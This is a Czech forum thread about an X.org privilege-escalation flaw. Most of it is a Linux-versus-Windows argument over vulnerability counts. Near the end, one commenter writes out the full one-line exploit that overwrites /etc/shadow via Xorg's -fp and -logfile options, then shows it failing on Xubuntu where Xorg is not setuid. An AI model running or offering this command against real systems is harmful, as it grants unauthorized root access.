Chyba v X.org umožňuje eskalaci práv na Linuxu i BSD

Pamatuju, jak XFree86 v devadesátých letech vypisoval (tuším pomocí direktivy -config) první řádek z /etc/shadow. Ty xka jsou prostě nějaký prokletý.

Ve skutečnosti, dopad je obrovský, ten, kdo nemá SELinux nebo AppArmor (nebo na BSD MAC), musí nutně aktualizovat.

Když si vezmu, kolik adminů razí tezi, že se neaktualizuje, aby se to "nerozbilo", tak si myslím, že se nám jich dost zapotí...

No v dost případech není X spouštěné, ale nainstalované je. Někdy ze šlendriánu, někdy to vyplývá ze závislostí balíků.

Pro expoloitaci této slabiny bohatě stačí, kdy je X.org nainstalovaný, ikdyž není spouštěný.

Treba na spousteni vzdaleneho Matlabu nebo ruznych vizualizaci se to docela hodi - neni nutne po siti prenaset potencialne velka zdrojova data.

Nerozumim, asi mi neco unika. Bud si pustim matlab lokalne, a pak taha data po siti (jsou-li primarne ulozena na serveru), nebo ho pustim pres ssh -X a pak bere data z (vice ci mene) lokalniho disku na serveru.

Debian ani Ubuntu nemaji Xorg setuid, takze tam nic...

Tak podle SecurePatterns treba Centos 7 nebo RHEL 7.5. Zadny z tech systemu nemam, tak nemuzu ozkouset.

Podotýkám že jenom pouhý kernel Linuxu měl loni 454 bezpečnostních děr, kdežto celé Windows 10 jich měly 268. Ne že bych chtěl bořit nějaké mýty :), ale podobná čísla můžete vidět i pár posledních let.
Zdroj: cvedetails.com

Dejte si studený obklad. Na výrok "On má někdo kapacitu denně vypisovat všechny zranitelnosti windowsů?" jsem odpověděl srovnáním počtu objevených zranitelností v pouhém kernelu Linuxu s počtem v celých Windows 10 za minulý rok, který je silně v neprospěch Linuxu. Na rozdíl od naprosté většiny diskutérů jsem také uvedl zdroj. Za mě je to více než adekvátní odpověď.

A vy? Kritizujete že počet objevených chyb není dobrá metrika, a zdroj není uvedený tak jako ve vaší bakalářce. Nic proti, klidně sem dejte lepší data, a klidně zdroje uvádějte v souladu s The Chicago Manual of Style, Seventeenth Edition :). Ale zvykněte si měřit stejným metrem. Pokud se vám nelíbí moje odpověď, mělo se vám ještě daleko méně líbit to, na co jsem odpovídal.

Nakonec k jádru věci. Někteří lidé z IT dělají náboženství. Takoví lidé s klidem řeknou, že Linux je bezpečnější/kva­litnější, a doloží to podle aktuální potřeby BUĎ tím že je v Linuxu objeveno méně zranitelností a tedy je jasně bezpečnější, NEBO tím že je jich objeveno více, takže se jasně chyby víc hledají, nahlašují a opravují. Nejde jim o faktický stav věci, ale o účelové napasování předem daného závěru na dostupné informace. S takovými lidmi je jakákoliv diskuse o ničem. Zatím mě přesvědčujete, že jste přesně z této kategorie.

Nevím proč bych se tomu věnoval já a v Rdmondu, a nevím proč sem taháte zcela nesouvisející téma. Řekl bych, že diskuse stylem "a vy zase mlátíte černochy" je pod vaší úroveň. Bohužel není.

Pokud jde o release 1809, tak tam vím o problému s mazáním uživatelských souborů a problému se ZIP složkami. Ten první problém se projevil u velmi malého procenta uživatelů, například žádný z mých počítačů neměl problém. Ztráta dat je samozřejmě velký problém, a situace je o to horší, že Windows Insiders problém hlásili, ale MS na hlášení nezareagoval. Nicméně je dobré si uvědomit, že chyby typu data loss s vyskytují i na jiných platformách, včetně Linuxu. Launchpad, Ubuntu, "data loss", 293 výsledků. A to jsou jen ty bugy, pro které nebyl uvolněný patch. Když zahrneme New, Confirmed, Triaged, In Progress, Fix Committed a Fix Released, tak je to rovnou 481 výsledků. (data jsou ze 7.10.)
https://bugs.launchpad.net/ubuntu?field.searchtext=%22data+loss%22

Navíc 1809 je v technicky upgrade Windows na novou verzi. Upgradoval jste někdy distro? A kolikrát se vám stalo, že jste skončil uprostřed procesu s nebootovatelným strojem, nebo na terminálu s blikajícím kurzorem? Takovou zkušenost bohužel mají uživatelé při upgradu distra nepříjemně často. Nemluvě o situacích, kdy update nebo upgrade distra rozbije zvukovku, síťovou kartu, grafiku, nebo prakticky cokoliv jiného. Takže si přestaňme nalhávat, že Windows jsou jediná platforma, na které se vyskytují problémy.

M$ pyj-ár úderka ma zas noční šichtu?
Tvoje drzost zřejmě nezná mezí, úplně klidně sem plácneš jakoukoli lež.

FYI, co ukazuje graf Total Number Of Vulnerabilities Of Top 50 Products By Vendor na https://www.cvedetails.com/top-50-products.php?year=0 ?

Říká se, že se stářím přichází moudrost. Někdy ale stáří přichází samo.
Když máte dojem, že někde je moc chyb, změňte systém. Určitě se skoro všech těch chyb zbavíte, ovšem narazíte na zcela jiné chyby, které dosud neznáte. Obávám se, že si moc nepomůžete.
Jiná věc je, že uživatele mnohem víc dopalují a trápí chyby typu dánský dialog v českém Outlooku, než nějaký vadný DHCPv6 v systemd-networkd.
https://www.theregister.co.uk/2018/10/26/systemd_dhcpv6_rce/
Jo, třeba díra ve Firefoxu, flashi, Adobe Readeru, to je jiná (ale zase často multiplatformní).
Admini jsou na to jinak, ty zase dánština v dialogu nevzrušuje, ale systemd-networkd by mohl být problém.

I když se v článku na ZDNetu píše, že to postihuje i Fedoru, tak jsem nebyl schopný to na F28 reprodukovat. Vytvořil jsem obyčejného uživatele a ani lokálně ani přes ssh ta eskalace práv neprošla bez hesla roota. Nebo dělám něco špatně a je tam potřeba splnit ještě nějakou podmínku?

v Xubuntu 18.04, take neprojde:

cd /etc; Xorg -fp "root::16431:0:­99999:7:::" -logfile shadow :1;su
/usr/lib/xorg/Xor­g.wrap: Only console users are allowed to run the X server
Heslo:
su: Selhání autentizace

soubor /etc/shadow samozrejme to nezmenilo

pozadavek pro exploit, nastavene root setuid pro Xorg zde proste neni ;-)
ls -l `which Xorg`
-rwxr-xr-x 1 root root 274 zář 5 13:38 /usr/bin/Xorg

v konzoli take neprojde:
$ cd /etc; Xorg -fp "root::16431:0:­99999:7:::" -logfile shadow :1;su
(EE)
Fatal server error:
(EE) Cannot move old log file "shadow" to "shadow.old"
(EE)
(EE)
Please consult the The X.Org Foundation support
at http://wiki.x.org
for help.
(EE)
Heslo:
su: Selhání autentizace

shadow beze zmeny...

$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1702 říj 17 22:37 /etc/shadow


verze Xorg neni nova/zaplatovana:
X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: Linux 4.4.0-135-generic x86_64 Ubuntu
Current Operating System: Linux t420s 4.15.0-34-generic #37-Ubuntu SMP Mon Aug 27 15:21:48 UTC 2018 x86_64
Kernel command line: BOOT_IMAGE=/bo­ot/vmlinuz-4.15.0-34-generic root=/dev/mapper/wd-root ro quiet splash net.ifnames=0 intel_iommu=on resume=/dev/wd/swap vt.handoff=1
Build Date: 24 September 2018 01:45:59PM
xorg-server 2:1.19.6-1ubuntu4.1 (For technical support please see http://www.ubuntu.com/support)
Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.